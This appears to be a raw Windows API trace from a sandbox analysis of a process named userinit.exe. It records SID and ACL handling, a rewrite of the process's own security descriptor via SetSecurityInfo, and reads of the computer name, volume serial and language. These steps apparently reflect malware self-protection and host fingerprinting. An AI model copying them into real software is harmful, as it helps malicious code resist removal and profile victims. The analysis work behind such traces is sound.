[0160.156] IsValidSid (pSid=0x2a0fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.156] ConvertSidToStringSidA () returned 0x1
[0160.156] LocalFree (hMem=0x659e80) returned 0x0
[0160.156] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.156] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0160.156] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fb34, pSourceSid=0x2a0fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a0fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.156] IsValidSid (pSid=0x2a0fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.156] ConvertSidToStringSidA () returned 0x1
[0160.156] LocalFree (hMem=0x659e80) returned 0x0
[0160.156] IsValidSid (pSid=0x2a0fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0160.156] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.156] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0160.156] CloseHandle (hObject=0x1d0) returned 1
[0160.156] ConvertStringSidToSidA () returned 0x1
[0160.156] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fa54, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a0fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0160.156] IsValidSid (pSid=0x2a0fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0160.157] ConvertSidToStringSidA () returned 0x1
[0160.157] LocalFree (hMem=0x666f58) returned 0x0
[0160.157] LocalFree (hMem=0x666f40) returned 0x0
[0160.157] ConvertStringSidToSidA () returned 0x1
[0160.157] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fae0, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a0fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0160.157] IsValidSid (pSid=0x2a0fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0160.157] ConvertSidToStringSidA () returned 0x1
[0160.157] LocalFree (hMem=0x666f58) returned 0x0
[0160.157] LocalFree (hMem=0x666f40) returned 0x0
[0160.157] ConvertStringSidToSidA () returned 0x1
[0160.157] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fbfc, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a0fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0160.157] IsValidSid (pSid=0x2a0fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0160.157] ConvertSidToStringSidA () returned 0x1
[0160.157] LocalFree (hMem=0x666f58) returned 0x0
[0160.157] LocalFree (hMem=0x666f40) returned 0x0
[0160.157] ConvertStringSidToSidA () returned 0x1
[0160.157] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fc8c, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a0fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0160.157] IsValidSid (pSid=0x2a0fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0160.157] ConvertSidToStringSidA () returned 0x1
[0160.157] LocalFree (hMem=0x666f58) returned 0x0
[0160.157] LocalFree (hMem=0x666f40) returned 0x0
[0160.157] ConvertStringSidToSidA () returned 0x1
[0160.157] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fd1c, pSourceSid=0x666f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a0fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0160.157] IsValidSid (pSid=0x2a0fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0160.157] ConvertSidToStringSidA () returned 0x1
[0160.157] LocalFree (hMem=0x666f58) returned 0x0
[0160.157] LocalFree (hMem=0x666f40) returned 0x0
[0160.157] GetCurrentProcessId () returned 0x174
[0160.157] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0x174) returned 0x1d0
[0160.157] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.158] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0160.158] GetSecurityInfo () returned 0x0
[0160.161] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.161] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0160.161] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x660f28, pControl=0x24e532, lpdwRevision=0x24e52c | out: pControl=0x24e532, lpdwRevision=0x24e52c) returned 1
[0160.161] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.161] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0160.161] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x660f28, pOwner=0x24e528, lpbOwnerDefaulted=0x24e51c | out: pOwner=0x24e528*=0x0, lpbOwnerDefaulted=0x24e51c) returned 1
[0160.161] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.161] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0160.161] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x660f28, pGroup=0x24e528, lpbGroupDefaulted=0x24e51c | out: pGroup=0x24e528*=0x0, lpbGroupDefaulted=0x24e51c) returned 1
[0160.161] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.161] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0160.161] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x660f28, lpbDaclPresent=0x24e520, pDacl=0x24e514, lpbDaclDefaulted=0x24e51c | out: lpbDaclPresent=0x24e520, pDacl=0x24e514, lpbDaclDefaulted=0x24e51c) returned 1
[0160.162] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.162] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0160.162] IsValidAcl (pAcl=0x660f3c) returned 1
[0160.162] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.162] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0160.162] GetAce (in: pAcl=0x660f3c, dwAceIndex=0x0, pAce=0x24e3b4 | out: pAce=0x24e3b4*=0x660f44) returned 1
[0160.162] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0fe74, pSourceSid=0x660f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a0fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.162] IsValidSid (pSid=0x2a0fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0160.162] ConvertSidToStringSidA () returned 0x1
[0160.162] LocalFree (hMem=0x667018) returned 0x0
[0160.162] GetAce (in: pAcl=0x660f3c, dwAceIndex=0x1, pAce=0x24e3b4 | out: pAce=0x24e3b4*=0x660f5c) returned 1
[0160.162] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a0ff60, pSourceSid=0x660f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a0ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.162] IsValidSid (pSid=0x2a0ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.162] ConvertSidToStringSidA () returned 0x1
[0160.162] LocalFree (hMem=0x667018) returned 0x0
[0160.162] GetAce (in: pAcl=0x660f3c, dwAceIndex=0x2, pAce=0x24e3b4 | out: pAce=0x24e3b4*=0x660f70) returned 1
[0160.162] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a029c0, pSourceSid=0x660f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a029c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0160.162] IsValidSid (pSid=0x2a029c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0160.162] ConvertSidToStringSidA () returned 0x1
[0160.162] LocalFree (hMem=0x667018) returned 0x0
[0160.163] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.163] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0160.163] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x660f28, lpbSaclPresent=0x24e524, pSacl=0x24e518, lpbSaclDefaulted=0x24e51c | out: lpbSaclPresent=0x24e524, pSacl=0x24e518, lpbSaclDefaulted=0x24e51c) returned 1
[0160.163] LocalFree (hMem=0x660f28) returned 0x0
[0160.163] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.163] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.163] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0160.163] GetLengthSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0160.163] GetLastError () returned 0x0
[0160.163] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.163] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0160.163] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.163] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0160.164] InitializeAcl (in: pAcl=0x667fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x667fa8) returned 1
[0160.164] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.164] GetLengthSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0160.164] GetLastError () returned 0x0
[0160.164] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.164] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.164] GetProcAddress (hModule=0x75370000, lpProcName="SetLastError") returned 0x753bbb08
[0160.164] SetLastError (dwErrCode=0x0)
[0160.164] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.164] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthorityCount") returned 0x76db0e0c
[0160.164] GetSidSubAuthorityCount (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a0f615
[0160.164] GetLastError () returned 0x0
[0160.164] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.164] SetLastError (dwErrCode=0x0)
[0160.164] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.164] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidIdentifierAuthority") returned 0x76daa935
[0160.164] GetSidIdentifierAuthority (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a0f616
[0160.164] GetLastError () returned 0x0
[0160.164] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.164] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.165] SetLastError (dwErrCode=0x0)
[0160.165] GetSidSubAuthorityCount (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0x2a0f615
[0160.165] GetLastError () returned 0x0
[0160.165] SetLastError (dwErrCode=0x0)
[0160.165] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.165] GetProcAddress (hModule=0x76da0000, lpProcName="GetSidSubAuthority") returned 0x76db0e24
[0160.165] GetSidSubAuthority (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), nSubAuthority=0x0) returned 0x2a0f61c
[0160.165] GetLastError () returned 0x0
[0160.165] IsValidSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0160.165] GetLengthSid (pSid=0x2a0f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0160.165] GetLastError () returned 0x0
[0160.165] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.165] GetProcAddress (hModule=0x76da0000, lpProcName="AddAce") returned 0x76daae0f
[0160.165] AddAce (in: pAcl=0x667fa8, dwAceRevision=0x2, dwStartingAceIndex=0xffffffff, pAceList=0x652f90, nAceListLength=0x14 | out: pAcl=0x667fa8) returned 1
[0160.165] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0160.165] GetProcAddress (hModule=0x75370000, lpProcName="GlobalFree") returned 0x753b9cf9
[0160.166] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0160.166] GetProcAddress (hModule=0x76da0000, lpProcName="SetSecurityInfo") returned 0x76da9edf
[0160.166] SetSecurityInfo () returned 0x0
[0160.166] CloseHandle (hObject=0x1d0) returned 1
[0160.166] GetComputerNameA (in: lpBuffer=0x2a0fd84, nSize=0x24e7ec | out: lpBuffer="CRH2YWU7", nSize=0x24e7ec) returned 1
[0160.166] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.166] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.167] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6e0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.167] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.167] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6e0, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.167] VirtualAlloc (lpAddress=0x2a10000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x2a10000
[0160.167] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.167] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.167] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.168] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.168] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.168] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.168] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.168] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.168] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.168] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.168] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.169] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.169] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.169] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.169] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.169] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.169] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24e7d4, nVolumeNameSize=0xc, lpVolumeSerialNumber=0x24e7e8, lpMaximumComponentLength=0x24e7e4, lpFileSystemFlags=0x24e7e0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24e7e8*=0x90c08a66, lpMaximumComponentLength=0x24e7e4*=0xff, lpFileSystemFlags=0x24e7e0*=0x3e700ff, lpFileSystemNameBuffer=0x0) returned 1
[0160.169] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x24e6d8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0160.169] GetSystemDefaultLangID () returned 0x640409
[0160.169] VerLanguageNameA (in: wLang=0x409, szLang=0x24e78c, cchLang=0x64 | out: szLang="English (United States)") returned 0x17
[0160.170] ExitProcess (uExitCode=0x0)
Thread:
id = 276
os_tid = 0x8bc
Thread:
id = 277
os_tid = 0x8c0
Process:
id = "43"
image_name = "userinit.exe"
